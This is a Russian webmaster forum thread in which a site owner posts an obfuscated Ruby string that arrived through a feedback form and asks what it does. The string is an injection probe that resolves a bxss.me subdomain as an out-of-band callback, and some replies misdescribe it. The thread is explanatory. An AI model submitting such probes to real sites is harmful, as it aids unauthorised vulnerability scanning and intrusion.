- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
А где там запрос к базе?
Не, я забыл написать, что я не прогер... просто я сагрился на concat и форму обратной связи :)
Всем привет!
В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.
Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?
'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)
Этот код никакого вреда принести не может, это просто кусок. Первую часть правильно привели выше - обычная конкатенация строк, вторая часть - получение данных хостинга и преобразование в строку. но так как в 4-м элементе ответа будет лежать ДНС сервера в бинарном виде - никакого смысла это не даст. Более того, запрос к "hitodglkgdinyda2b9.bxss.me." вернет 500 код, потому что такого адреса не существует, соответственно эта часть вообще или зарейзит эксепшен или вернет None
Более того, запрос к "hitodglkgdinyda2b9.bxss.me." вернет 500 код, потому что такого адреса не существует
Возможно, на момент отправки этого кода адрес существовал.
Неважно, даже при удачном запросе вернется ДНС в бинарном виде, который потом преобразуется в строку и не уверен что там так можно. Но я на Руби не пишу. За 5 минут поставил, запустил, увидел что происходит.
Этот код никакого вреда принести не может, это просто кусок.
Это тестирование на предмет XSS-уязвимости. Вред принесёт тот код, который будет внедрён в случае положительного результата.
Это тестирование на предмет XSS-уязвимости.
Не исключено. А можешь привести алгоритм - как это может работать?
Для иньекций довольно странный выбор языка. Да и не запустится этот код на руби, даже если он установлен на хостинге. Я пока не вижу вариантов, как такое может повредить.